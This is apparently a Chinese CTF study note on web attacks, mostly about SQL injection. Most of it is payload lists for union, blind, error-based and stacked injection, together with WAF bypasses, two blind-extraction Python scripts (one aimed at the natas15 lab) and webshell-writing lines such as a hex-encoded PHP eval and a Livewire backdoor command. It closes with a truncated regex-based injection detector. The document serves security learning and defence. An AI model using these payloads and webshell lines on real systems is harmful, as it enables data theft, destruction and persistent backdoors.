mindmap root(Web安全常见攻击类型) 注入类攻击 SQL注入 NoSQL注入 LDAP注入 OS命令注入 表达式语言注入 跨站脚本 XSS 反射型XSS 存储型XSS DOM型XSS 跨站请求伪造 CSRF GET型CSRF POST型CSRF 服务端请求伪造 SSRF 攻击内网服务 攻击云元数据服务 盲SSRF 文件相关漏洞 文件上传漏洞 绕过前端校验 绕过MIME类型 绕过内容校验 解析漏洞 文件包含漏洞 本地文件包含 LFI 远程文件包含 RFI 路径遍历/目录穿越 代码/命令执行 远程代码执行 RCE 反序列化漏洞 PHP反序列化 Java反序列化 Python反序列化 模板注入 SSTI 表达式注入 EL/OGNL 认证与授权缺陷 暴力破解 弱口令 会话固定 越权漏洞 水平越权 垂直越权 JWT攻击 OAuth漏洞 信息泄露 敏感信息暴露 目录列表 备份文件泄露 调试信息泄露 HTTP协议攻击 HTTP头注入 请求走私 Host头攻击 Cookie篡改 会话劫持 前端/客户端攻击 点击劫持 Clickjacking WebSocket攻击 CORS配置错误 CDN劫持 链路劫持 API安全 GraphQL注入 批量分配 Mass Assignment API速率限制绕过 中间件/服务器漏洞 Log4Shell Shiro反序列化 FastJSON漏洞 Struts2漏洞 Tomcat弱口令/部署 DDoS攻击 CC攻击 慢速攻击 XXE外部实体注入 SSI注入 CSP绕过SQL
SQL注入通常是由服务器后端参数过滤不严格、权限设置不合理等原因产生的。当攻击者构造恶意的SQL注入语句时,能够探测到后端数据库中存在的用户信息,从而获取到敏感信息或者实现提权。
ctf靶场中sql手工注入的常见步骤如下。
数据库版本在5.0大版本以上,说明可以利用information_schema系统库。具体的输入语句可能为以下几点。
- 找注入点,判断闭合方式。
- 判断列数。 select * from news where id=1 order by 2
- 爆库名。-1 union select 1,database() # 。
- 爆表。?id=-1' union select 1,user(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
- 爆列。?id=-1' union select 1,user(),(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')--+
- 脱库。?id=-1' union select 1,2,group_concat(username,':',password) from users--+或者-1 union select 1,group_concat(flag) from sqli.flag #
闭合方式
- //判断闭合方式,主要是加注释和没加注释两种方式
- 'or''='
- ') or ('a'='a
- 'or 1=1-- //注释方式还有 --+ ,#,/*
- admin'--
- " or ""="
- ') or ('1'='1
- ') or ('1'='1')-- //闭合('
- 1' or '1'='1' or '1'='1
- ') union select 1,'admin','5f4dcc3b5aa765d61d8327deb882cf99'--
- '/**/or/**/1=1# //绕过空格
- ' union select 1,2,3--
- ' or 1=1 limit 1--
- ' union select 1,2,3 from dual--
- ' union select 1,user(),database()--
- ' or 1=1 LIMIT 1 OFFSET 0--
- ' or 1=1 limit 1--
- ' or 1=1 offset 0--
复制代码 联合注入
- //主要是为了找列数和判断回显位置
- 判断列数。 select * from news where id=1 union order by 2 --+ (2不报错,3报错,那么可包含2列)
- 找回显位置。-1' union select 1,2,3,...,n(n为整数) --+ (哪个位置回显,就用哪个位置查数据)
复制代码 时间/bool盲注
- //主要通过时间差和页面响应差异进行判断
- ?sort=%27|rand(true)--+ ?sort=%27|rand(false)--+
- ' AND (SELECT pg_sleep(5))--
- ' AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)='a'--+
- ' AND IF(ASCII(SUBSTR((SELECT password FROM users LIMIT 0,1),1,1))>100, BENCHMARK(10000000,MD5('a')), 0)--+ //类似if-else语句
- ' AND 1=(SELECT CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('a',5) ELSE 1 END FROM dual)--
- ' AND json_quote(printf('%c',(SELECT substr(sql,1,1) FROM sqlite_master)))>0--
复制代码 截断函数
主要是substring,mid,ord,substr,left等。- ' AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)='a'--+
复制代码 部分说明SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables从 information_schema.tables 系统视图中取出 table_name 字段的第一个字符(SUBSTRING(...,1,1))。WHERE table_schema=database()只筛选当前数据库(database() 返回当前库名)中的表。LIMIT 0,1取结果集的第一条记录(即第一张表)。= 'a'将上面取到的字符与字母 'a' 比较。整个子查询的结果是一个布尔值(真/假),通常放在注入点的 AND 或 WHERE 条件中使用。
- 如果页面正常显示,说明第一个表名的首字母是 'a'
- 如果页面异常或无回显,则不是 'a',继续尝试其他字符。
条件语句
- ' AND IF(ASCII(SUBSTR((SELECT password FROM users LIMIT 0,1),1,1))>100, BENCHMARK(10000000,MD5('a')), 0)--+
- ' AND 1=(SELECT CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('a',5) ELSE 1 END FROM dual)--
复制代码 部分含义IF(条件, 真值, 假值)MySQL条件函数,条件成立则执行真值部分,否则执行假值部分ASCII(SUBSTR((SELECT password FROM users LIMIT 0,1),1,1)) > 100条件:取 users 表第一行密码字段的第一个字符,判断其ASCII码是否大于100BENCHMARK(10000000, MD5('a'))真值时执行:重复计算 MD5('a') 一千万次,产生明显时间延迟(约几秒)0假值时执行:立即返回0,无延迟--+MySQL注释,确保后续内容被忽略(用于拼接攻击语句)备用脚本1- import requests
- url = 'http://natas15.natas.labs.overthewire.org/index.php'
- username = 'natas15'
- password = 'SdqIqBsFcz3yotlNYErZSZwblkm0lrvx'
- key = ''
- def main():
- key = ''
- for i in range(0,32):
- for __ in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~@!#{}$%^,&*()_+-":
- #substr(... , {i+1}, 1):提取密码的第 i+1 个字符。这里与range(0,32)的从零开始对应
- #BINARY "{char}":区分大小写的字符比较
- # #:注释掉原始查询的剩余部分
- data = {'username': f'natas16" and substr((SELECT password FROM users WHERE `username`= "natas16"), {i+1}, 1) = BINARY "{__}" #'}
- #可以替换成参考的payload: data = {'username': 'natas16" and substr((SELECT password FROM users WHERE `username`= "natas16"),'+str(i+1)+',1)= BINARY "' + __ + '" #'}
- print("Now is trying: " + key + __, end = '\r')
- response = requests.post(url,data=data,auth=(username,password))
- #print(response.text)
- if "exists" in response.text:
- key = key + __
- break
- print("[+] NextPassword:" + key)
- if __name__ == "__main__":
- main()
复制代码 备用脚本2- import concurrent.futures
- import requests
- import threading
-
- # 定义所有可能的字符集
- ALL_ALPHA = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
- '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '_', ',', '-', '@', '!', '~', ':']
-
- # SQL注入载荷模板
- PAYLOADS = [
- ["length(database())>$NUM$", "mid(database(),$START$,1)='$ALPHA$'"],
- ["(select (length(group_concat(schema_name))) from information_schema.schemata)>$NUM$", "(select mid(group_concat(schema_name),$START$,1) from information_schema.schemata)='$ALPHA$'"],
- ["(select length(group_concat(table_name)) from information_schema.tables where table_schema='YOUR_DB')>$NUM$", "(select mid(group_concat(table_name),$START$,1) from information_schema.tables where table_schema='YOUR_DB')='$ALPHA$'"],
- ["(select length(group_concat(column_name)) from information_schema.columns where table_schema='YOUR_DB' and table_name='YOUR_TABLE')>$NUM$", "(select mid(group_concat(column_name),$START$,1) from information_schema.columns where table_schema='YOUR_DB' and table_name='YOUR_TABLE')='$ALPHA$'"],
- ["(select length(group_concat(YOUR_COLUMN)) from YOUR_DB.YOUR_TABLE)>$NUM$", "(select mid(group_concat(YOUR_COLUMN),$START$,1) from YOUR_DB.YOUR_TABLE)='$ALPHA$'"]
- ]
-
- lock = threading.Lock() # 线程锁,用于同步写入结果
- result = {} # 存储最终结果的字典
- check_current = '' # 当前使用的SQL注入载荷
- low, high = 1, 1024 # 长度二分查找范围
- max_thread = 100 # 最大线程数
- response_in_url = "you are in" # 成功注入的响应标识
-
- def check_url(url: str, start: int, char: str):
- """检查URL是否符合给定条件"""
- payload = check_current[1].replace("$ALPHA$", char).replace("$START$", str(start))
- # or和and绕过
- url = url.replace("$FUZZ$", payload).replace("or",'oorr').replace("and",'anandd')
-
- try:
- response = requests.get(url)
- if response_in_url in response.text.lower():
- with lock:
- if start not in result: # 只有当该位置还未被填充时才更新结果
- result[start] = char
- return True # 返回True表示找到了正确的字符
- except requests.RequestException as e:
- print(f"Failed to reach {url}: {e}")
- return False
-
- def check_length(url: str, low: int, high: int) -> int:
- """使用二分法确定目标字符串长度"""
- while low < high:
- mid = (low + high) // 2
- payload = check_current[0].replace("$NUM$", str(mid))
- try:
- response = requests.get(url.replace("$FUZZ$", payload).replace("or",'oorr').replace("and",'anandd'))
- if response_in_url in response.text.lower():
- low = mid + 1
- else:
- high = mid
- except requests.RequestException as e:
- print(f"Failed to reach {url}: {e}")
- return high
-
- def main():
- mode = input("选择模式:布尔盲注(1)还是延时注入(2)->\n")
- if mode == '1':
- url = input("输入URL,注入点用$FUZZ$代替->\n")
- global max_thread, response_in_url
- max_thread = int(input('最大线程数->\n'))
- response_in_url = input('成功注入的回显(小写)->\n')
-
- search_type = input("想要查询当前数据库(1),所有数据库(2),表(3),字段(4),数据(5)->\n")
- global check_current
-
- # 根据用户输入设置当前使用的载荷
- if search_type == '1':
- check_current = PAYLOADS[0]
- elif search_type == '2':
- check_current = PAYLOADS[1]
- elif search_type == '3':
- db_name = input("数据库名称->\n")
- check_current = [p.replace('YOUR_DB', db_name) for p in PAYLOADS[2]]
- elif search_type == '4':
- db_name = input("数据库名称->\n")
- table_name = input("数据表名称->\n")
- check_current = [p.replace('YOUR_DB', db_name).replace('YOUR_TABLE', table_name) for p in PAYLOADS[3]]
- elif search_type == '5':
- db_name = input("数据库名称->\n")
- table_name = input("数据表名称->\n")
- column_name = input("字段名称(多个字段用逗号分隔)->\n").replace(",", "',':',")
- check_current = [p.replace('YOUR_DB', db_name).replace('YOUR_TABLE', table_name).replace('YOUR_COLUMN', column_name) for p in PAYLOADS[4]]
- else:
- print("输入错误")
- return
-
- length = check_length(url, low, high)
- with concurrent.futures.ThreadPoolExecutor(max_workers=max_thread) as executor:
- futures = set()
-
- def submit_tasks(index):
- """提交特定索引处的所有任务"""
- if index + 1 not in result: # 如果该位置尚未被猜解出来
- for c in ALL_ALPHA:
- futures.add(executor.submit(check_url, url, index + 1, c))
-
- # 提交所有任务
- for index in range(length):
- submit_tasks(index)
-
- # 处理已完成的任务
- for future in concurrent.futures.as_completed(futures):
- try:
- if future.result(): # 如果找到了正确的字符,则移除相关的其他任务
- with lock:
- position = next((pos for pos in range(length) if pos + 1 not in result), None)
- if position is not None:
- submit_tasks(position)
- except Exception as e:
- print(f"A task generated an exception: {e}")
-
- # 整理并打印结果
- result_list = [result[i + 1] for i in range(length)]
- print(''.join(result_list))
- elif mode == '2':
- pass # 延时注入的实现可以在这里添加
- else:
- print("模式选择错误")
-
- if __name__ == "__main__":
- main()
复制代码 整体来说和burpsuite的”笛卡尔“爆破模块的原理是一样的。
报错注入
- //主要通过报错处理查看,所以“404”不一定是真的“404”
- ' AND updatexml(1,concat(0x7e,database(),0x7e),1) --+
- ' AND extractvalue(1,concat(0x7e,database(),0x7e))--+
- ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
- ' AND 1=CAST((SELECT version()) AS integer)--
- 'and 1= ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where table_name='admin' rownum=1)) --
复制代码 XPath
' AND updatexml(1,concat(0x7e,database(),0x7e),1) --+
原理:
- updatexml() 函数需要两个XPath路径参数,当第二个参数不是合法XPath时,会触发错误并返回其内容。
输出示例:
XPATH syntax error: '~testdb~'
' AND extractvalue(1,concat(0x7e,database(),0x7e))--+
原理:
- 与 updatexml 类似,extractvalue() 也期望XPath表达式,非法XPath会导致报错并输出内容。
输出示例:
XPATH syntax error: '~testdb~'
主键重复报错注入
- ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
复制代码 原理
组成部分代码/语句含义与作用触发注入点' AND ( ... )--+闭合原始SQL中的引号,追加恶意子查询,并用 --+ 注释掉后续原始SQL代码。外层结构SELECT * FROM ( ... ) a将内部子查询结果作为一个派生表(别名 a),再整体作为条件参与 AND 运算。内部核心子查询SELECT COUNT(*), CONCAT(database(), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x1. 从系统表 information_schema.tables 中读取数据(任意表)。
2. FLOOR(RAND(0)*2):根据种子 0 生成伪随机序列(如 0,1,1,0,1...)。
3. CONCAT(database(), ...):将当前数据库名与该随机数拼接,得到如 "testdb0" 或 "testdb1" 的值,并命名为 x。
4. GROUP BY x:按 x 分组统计 COUNT(*)。报错机制无显式错误函数由于 RAND() 在 GROUP BY 分组过程中每行计算的值可能重复,导致分组键出现不确定性重复,MySQL 会抛出类似 Duplicate entry 'testdb1' for key 'group_key' 的错误,并在错误信息中泄露 x 的值(即包含数据库名的字符串)。最终目的泄露数据库名攻击者通过观察页面返回的数据库错误信息,从中提取当前数据库名称,为进一步攻击提供信息。[!example]
- sql
- > SELECT COUNT(*), CONCAT(database(), FLOOR(RAND(0)*2)) AS x
- > FROM information_schema.tables
- > GROUP BY x;
复制代码执行过程分析:
information_schema.tables 包含多行(假设有5张表)。
对于每一行,计算 FLOOR(RAND(0)*2):
第一次:RAND(0) 返回一个值,乘以2后取整,得到 0。
第二次:得到 1。
第三次:得到 1。
第四次:得到 0。
第五次:得到 1。
序列为:0, 1, 1, 0, 1。
CONCAT(database(), ...) 拼接后得到分组键值:'test0', 'test1', 'test1', 'test0', 'test1'。
GROUP BY x 试图将这些键分组。当处理到第二行时,键 'test1' 首次出现,创建一个分组。第三行又出现 'test1',此时需要将该行计入分组,但 MySQL 内部处理可能导致重复键错误,因为 x 是表达式结果,在分组过程中可能被多次计算,导致临时表出现重复条目。
最终报错类似:
text
ERROR 1062 (23000): Duplicate entry 'test1' for key 'group_key'
其中 'test1' 就泄露了数据库名 test。
这就是通过主键冲突报错获取数据库名的具体例子。
堆叠注入
- //和宽字节注入、外带注入一样,几乎发现该漏洞的概率相对很低。
- ?id=1%27; insert%20into%20users(id,username,password) values(38,%27admin%27,%27Admin@123%27)--+
- ?id=1;delete from users where username='test01'--+
- ?id=1');update users set password='123456' where username='test01'--+
- ?id=1;update users set username='admin' where username='test01'--+
- '; DROP TABLE users; INSERT INTO users VALUES (1,'hacker','pass')--+
复制代码 '; DROP TABLE users; INSERT INTO users VALUES (1,'hacker','pass')--+
原理:
- 原SQL语句被提前终止(通过分号 ;),之后攻击者追加两条独立SQL:
- DROP TABLE users → 删除 users 表(破坏数据)。
- INSERT INTO users VALUES (1,'hacker','pass') → 尝试插入恶意用户(可能用于维持访问)。
- 前提:数据库驱动支持多语句执行(如PHP的 mysqli_multi_query()),否则无效。
该部分可以参考的题目 【suctf 2019】EasySQL。
二次注入
这里通常是属于存储型注入或转义不当(addslash)产生的,一般与insert、update等sql语句有关,通常可能发生在重命名或者忘记密码,注册用户等环节。目前比较好的题目见sqli-labs 24关 或 Web专项训练(二)-- nssctf严选题 - 河东式贺喜 - 博客园的【XDCTF 2015】filemanager。
除此之外,还有什么DNSlog外带注入和access偏移注入,我目前没见过类似的题目,暂不予以介绍。
读写文件
这个部分的题目在sqli靶场和部分CVE中出现过。- INSERT INTO image (name, raster) VALUES ('beautiful image', lo_import('/etc/motd'));
- ' UNION SELECT lo_export('/etc/passwd', '/tmp/passwd')--
- 服务器端的`lo_import`和`lo_export`函数具有和它们的客户端同类大不相同的行为。这两个函数从服务器的文件系统中读和写文件,使用的是数据库所有者的权限。 参考https://www.rockdata.net/zh-cn/docs/16/lo-funcs.html
- LOAD_FILE INTO OUTFILE secure_file_priv ='E:\\secure_dir\\' //当该值为特定值,空值,NULL时,只有在_E:\\secure_dir\\_目录下的文件才能被读写,读写不做限制,禁止读写。 SQLi-labs 第7关
- --file-read --file-write //sqlmap
- FILE_READ file_write //skywalking
- python Livepyre.py -u http://localhost:8080/ -f system -p 'printf "<?php @eval($_POST["cmd"]); ?>" > /var/www/html/livewire-playground/public/backdoor.php' -F // Laravel Livewire
复制代码 payload总集(含简易bypass)
这部分主要是结合sqli-labs与ctfhub的sql注入部分总结的,当然会有其他靶场的一些简单经验或者一些其他的数据库版本。各类数据库版本的paylaod已经包含在时间盲注、报错注入、堆叠注入、二次注入等开头部分,这里不再展示。- //ctf思路总集
- - 找注入点,判断闭合方式。
- - 判断列数。 select * from news where id=1 order by 2
- - 爆库名。-1 union select 1,database() # 。
- - 爆表。?id=-1' union select 1,user(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
- - 爆列。?id=-1' union select 1,user(),(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')--+
- - 脱库。?id=-1' union select 1,2,group_concat(username,':',password) from users--+或者-1 union select 1,group_concat(flag) from sqli.flag #
- ?id=1%df' union select version(),database() --+ //宽字节注入
- passwd=admin&submit=Submit&uname=admin汉' union select 1,(select%20group_concat(username,0x3a,password)%20from%20users)# //宽字节注入,总之非常少见
- //报错+
- ?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+
- ?id=1" and extractvalue(1,concat(0x7e,(select concat(username,':',password) from users limit 0,1)))--+
- ?id=' or extractvalue(1,concat(0x7e,database())) or'
- ?id=1' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or '
- ?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and'
- //时间盲注
- ?id=1' and if(ascii(mid(database(),1,1))=115,sleep(),1)--+
- ?id=1" and if(length(database())=8,sleep(5),1)--+
- //简单的WAF绕过bypass,原理主要是等价转换或相近原则+编码+参数污染+脏数据等。
- =用like,in,regexp代替
- ?id=' || extractvalue(1,concat(0x7e,(select%20(group_concat(column_name)) from (infoorrmation_schema.columns) where(table_schema=database()) anandd (table_name=%27users%27))));%00 //双写+逻辑符号替代字符+别样注释
- ?id=0%27%0aunIOn%0aSeleCT%0a1,(selECt%0agroup_concat(username,%27:%27,password)%0afrom%0ausers),3;%00 //大小写绕过
- ?id=1&id=0%27union%20select%201,2,(select%20group_concat(username,%27:%27,password)%20from%20users)--+ //HTTP参数污染
- ?id=-1%df'%20union%20select%201,2,(select%20group_concat(username,0x3a,password)%20from%20users)--+ //宽字节
- ?sort=1;select 0x3c3f70687020406576616c28245f504f53545b27636d64275d29203f3e%20into outfile
- '/www/var/html/shell.php'--+ //搜索框+堆叠+编码
- ?id=1+and+updatexml(1,concat(0x7e,(select+database()),0x7e),1) //空格替换,除此之外,还有/*!50000SELECT*/ ,/**/,%0a,%d
- //增删改查基本语句
- ?id=1%27; insert%20into%20users(id,username,password) values(38,%27admin%27,%27Admin@123%27)--+
- ?id=1;delete from users where username='test01'--+
- ?id=1');update users set password='123456' where username='test01'--+
- ?id=1;update users set username='admin' where username='test01'--+
- //sqlmap使用示例
- python3 sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-15/" --forms --dbs --users --batch
- -os-shell,tamper,1.txt等,参考 https://www.cnblogs.com/yilishazi/p/15209181.html
- //UA,Cookie,Referer,XFF
- User-Agent: ' or extractvalue(1,concat(0x7e,database())))#
- ' or extractvalue(1,concat(0x7e,(select concat(username,':',password) from users limit 0,1),0x7e))
- Referer: ' or extractvalue(1,concat(0x7e,(select concat(username,':',password) from users limit 0,1),0x7e)) or'
- Cookie: uname=admin' order by 3#
复制代码 基于规则匹配和语义分析的检测与防护
- 特殊字符:单引号(')、双引号(")、反斜杠(\)、注释符(--, #, /* */)。
- 逻辑运算符:AND、OR、XOR、||、&&。
- 函数调用:SLEEP()、BENCHMARK()、extractvalue()、updatexml()、database()、version()。
- 关键字:UNION、SELECT、FROM、WHERE、ORDER BY、GROUP BY、INTO OUTFILE。
- 报错信息:数据库错误日志中暴露的语法错误、函数异常等(如“Unknown column”、“syntax error”)。
- 响应时间:执行SLEEP(5)后响应明显延迟。
规则匹配相对来说,对于接触过比较多靶场的白盒审计选手或者熟悉sql注入原理的人群来说,这类人都很容易写出来。但是语义分析部分就相对比较难了。所以,建议用CC之类的ai试试。
sql_injection_detector.py核心功能
- 基于规则匹配的检测 (15+ 检测规则)
- UNION注入检测
- OR/AND恒真条件检测 (如 OR '1'='1', AND 1=1)
- SQL注释注入检测 (--, #, /* */)
- 堆叠查询检测 (; DROP TABLE...)
- 时间盲注检测 (SLEEP(), BENCHMARK())
- 布尔盲注检测 (IF, CASE)
- 文件操作注入检测 (LOAD_FILE, INTO OUTFILE)
- 错误回显注入检测 (EXTRACTVALUE, UPDATEXML)
- 十六进制编码检测
- xp_cmdshell命令执行检测
- 语义分析功能
- 不平衡引号检测
- 危险函数调用检测
- 多语句分隔符检测
- 嵌套查询检测
- 重言式模式检测 (1=1, TRUE=TRUE)
- 用户输入作为SQL代码检测
- 风险等级评估
- SAFE, LOW, MEDIUM, HIGH, CRITICAL 五级
- 防护与建议
- 输入净化/转义功能
- 参数化查询建议
- ORM框架使用建议
- 最小权限原则建议
[code]# -*- coding: utf-8 -*-import reclass RiskLevel: SAFE = "safe" LOW = "low" MEDIUM = "medium" HIGH = "high" CRITICAL = "critical"class DetectionResult: def __init__(self, is_sql_injection, risk_level, matched_patterns, analysis_details, recommendations): self.is_sql_injection = is_sql_injection self.risk_level = risk_level self.matched_patterns = matched_patterns self.analysis_details = analysis_details self.recommendations = recommendationsclass SQLInjectionDetector: def __init__(self): self.rules = self._init_detection_rules() self.sql_keywords = [ 'SELECT', 'INSERT', 'UPDATE', 'DELETE', 'DROP', 'CREATE', 'ALTER', 'EXEC', 'EXECUTE', 'UNION', 'FROM', 'WHERE', 'AND', 'OR', 'JOIN', 'LEFT', 'RIGHT', 'INNER', 'OUTER', 'HAVING', 'GROUP', 'ORDER', 'BY', 'LIMIT', 'OFFSET', 'INTO', 'VALUES', 'SET', 'TABLE', 'DATABASE' ] self.dangerous_functions = [ 'BENCHMARK', 'SLEEP', 'WAITFOR', 'DELAY', 'LOAD_FILE', 'INTO OUTFILE', 'INTO DUMPFILE', 'EXECUTE', 'OPENROWSET', 'OPENDATASOURCE', 'XP_CMDSHELL', 'SP_EXECUTESQL', 'xp_regread', 'xp_regwrite' ] def _init_detection_rules(self): return [ { 'name': 'UNION injection', 'pattern': r'UNION\s+(ALL\s+)?SELECT', 'risk': RiskLevel.HIGH, 'description': 'Detect UNION SELECT injection attack', 'case_insensitive': True }, { 'name': 'OR tautology', 'pattern': r"OR\s+['\"][^'\"]*['\"]\s*=\s*['\"][^'\"]*['\"]", 'risk': RiskLevel.CRITICAL, 'description': 'Detect OR 1=1 type tautology injection', 'case_insensitive': True }, { 'name': 'OR tautology simple', 'pattern': r"OR\s+1\s*=\s*1", 'risk': RiskLevel.CRITICAL, 'description': 'Detect OR 1=1 type tautology injection', 'case_insensitive': True }, { 'name': 'Quoted equality', 'pattern': r"['\"][^'\"]+['\"]\s*=\s*['\"][^'\"]+['\"]", 'risk': RiskLevel.MEDIUM, 'description': 'Detect quoted string equality pattern', 'case_insensitive': True }, { 'name': 'Single quote with OR', 'pattern': r"'.*OR.*=", 'risk': RiskLevel.CRITICAL, 'description': 'Detect OR condition inside single quotes', 'case_insensitive': True }, { 'name': 'Single quote with AND', 'pattern': r"'.*AND.*=", 'risk': RiskLevel.HIGH, 'description': 'Detect AND condition inside single quotes', 'case_insensitive': True }, { 'name': 'AND tautology', 'pattern': r"AND\s+['\"][^'\"]*['\"]\s*=\s*['\"][^'\"]*['\"]", 'risk': RiskLevel.HIGH, 'description': 'Detect AND 1=1 type tautology injection', 'case_insensitive': True }, { 'name': 'AND tautology simple', 'pattern': r"AND\s+1\s*=\s*1", 'risk': RiskLevel.HIGH, 'description': 'Detect AND 1=1 type tautology injection', 'case_insensitive': True }, { 'name': 'Comment injection', 'pattern': r"'[\s]*--|--|\#|/\*", 'risk': RiskLevel.HIGH, 'description': 'Detect SQL comment injection' }, { 'name': 'Stacked query', 'pattern': r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP|CREATE|ALTER|EXEC)", 'risk': RiskLevel.CRITICAL, 'description': 'Detect stacked query injection', 'case_insensitive': True }, { 'name': 'Time-based blind injection', 'pattern': r"BENCHMARK\(|SLEEP\(|WAITFOR\(|DELAY\(", 'risk': RiskLevel.CRITICAL, 'description': 'Detect time-based blind injection', 'case_insensitive': True }, { 'name': 'Boolean blind injection', 'pattern': r"IF\s+|CASE\s+", 'risk': RiskLevel.HIGH, 'description': 'Detect conditional boolean blind injection', 'case_insensitive': True }, { 'name': 'File operation injection', 'pattern': r"LOAD_FILE|INTO\s+(OUTFILE|DUMPFILE)", 'risk': RiskLevel.CRITICAL, 'description': 'Detect file read/write injection', 'case_insensitive': True }, { 'name': 'Error-based injection', 'pattern': r"EXTRACTVALUE|UPDATEXML|FLOOR\(|RAND\(", 'risk': RiskLevel.HIGH, 'description': 'Detect XPATH/error-based blind injection', 'case_insensitive': True }, { 'name': 'Hex encoding', 'pattern': r"0x[0-9a-fA-F]+", 'risk': RiskLevel.MEDIUM, 'description': 'Detect hex encoded data' }, { 'name': 'SLEEP function', 'pattern': r"SLEEP\s*\(\s*[0-9]+\s*\)", 'risk': RiskLevel.HIGH, 'description': 'Detect SLEEP time-based injection', 'case_insensitive': True }, { 'name': 'Subquery injection', 'pattern': r"SELECT\s+.*\s+FROM\s+.*\s+WHERE", 'risk': RiskLevel.MEDIUM, 'description': 'Detect subquery injection', 'case_insensitive': True }, { 'name': 'xp_cmdshell', 'pattern': r"xp_cmdshell", 'risk': RiskLevel.CRITICAL, 'description': 'Detect xp_cmdshell command execution', 'case_insensitive': True } ] def detect(self, user_input): matched_rules = [] risk_levels = [] for rule in self.rules: pattern = rule['pattern'] flags = re.IGNORECASE if rule.get('case_insensitive') else 0 if re.search(pattern, user_input, flags): matched_rules.append({ 'name': rule['name'], 'description': rule['description'], 'risk': rule['risk'] }) risk_levels.append(rule['risk']) semantic_analysis = self._semantic_analysis(user_input) matched_rules.extend(semantic_analysis['additional_rules']) risk_levels.extend(semantic_analysis['additional_risks']) final_risk = self._calculate_final_risk(risk_levels) is_injection = len(matched_rules) > 0 or final_risk != RiskLevel.SAFE recommendations = self._generate_recommendations(matched_rules, semantic_analysis) return DetectionResult( is_sql_injection=is_injection, risk_level=final_risk, matched_patterns=[r['name'] for r in matched_rules], analysis_details=self._generate_analysis_report(matched_rules, semantic_analysis), recommendations=recommendations ) def _semantic_analysis(self, user_input): additional_rules = [] additional_risks = [] details = {} tokenized = self._tokenize(user_input) details['tokens'] = tokenized if self._has_unbalanced_quotes(user_input): additional_rules.append({ 'name': 'Unbalanced quotes', 'description': 'Detected unclosed quotes, potential injection risk', 'risk': RiskLevel.MEDIUM }) additional_risks.append(RiskLevel.MEDIUM) if self._has_dangerous_function_call(user_input): additional_rules.append({ 'name': 'Dangerous function call', 'description': 'Detected potentially dangerous function call', 'risk': RiskLevel.CRITICAL }) additional_risks.append(RiskLevel.CRITICAL) if self._has_multiple_statements(user_input): additional_rules.append({ 'name': 'Multiple SQL statements', 'description': 'Detected multiple SQL statement separators', 'risk': RiskLevel.HIGH }) additional_risks.append(RiskLevel.HIGH) if self._has_nested_query(user_input): additional_rules.append({ 'name': 'Nested query', 'description': 'Detected nested subquery', 'risk': RiskLevel.MEDIUM }) additional_risks.append(RiskLevel.MEDIUM) if self._has_tautology_pattern(tokenized): additional_rules.append({ 'name': 'Tautology pattern', 'description': 'Detected always-true or always-false condition', 'risk': RiskLevel.HIGH }) additional_risks.append(RiskLevel.HIGH) if self._contains_user_input_as_sql(tokenized): additional_rules.append({ 'name': 'User input as SQL code', 'description': 'User input may be parsed as SQL code', 'risk': RiskLevel.HIGH }) additional_risks.append(RiskLevel.HIGH) return { 'additional_rules': additional_rules, 'additional_risks': additional_risks, 'details': details } def _tokenize(self, text): tokens = [] current_token = "" in_string = False string_char = None for char in text: if char in ("'", '"') and not in_string: in_string = True string_char = char current_token += char elif char == string_char and in_string: in_string = False current_token += char tokens.append(current_token) current_token = "" string_char = None elif char in (' ', '\t', '\n', ';', ',', '(', ')', '=') and not in_string: if current_token: tokens.append(current_token) current_token = "" if char not in (' ', '\t', '\n'): tokens.append(char) else: current_token += char if current_token: tokens.append(current_token) return tokens def _has_unbalanced_quotes(self, text): single_quote_count = text.count("'") double_quote_count = text.count('"') backtick_count = text.count('`') return (single_quote_count % 2 != 0 or double_quote_count % 2 != 0 or backtick_count % 2 != 0) def _has_dangerous_function_call(self, text): text_upper = text.upper() for func in self.dangerous_functions: if func in text_upper: return True return False def _has_multiple_statements(self, text): pattern = r";\s*[\w\(\)]+" matches = re.findall(re.compile(pattern, re.IGNORECASE), text) return len(matches) > 1 def _has_nested_query(self, text): return text.upper().count('SELECT') > 1 def _has_tautology_pattern(self, tokens): tautology_patterns = [ ('1', '=', '1'), ('0', ' |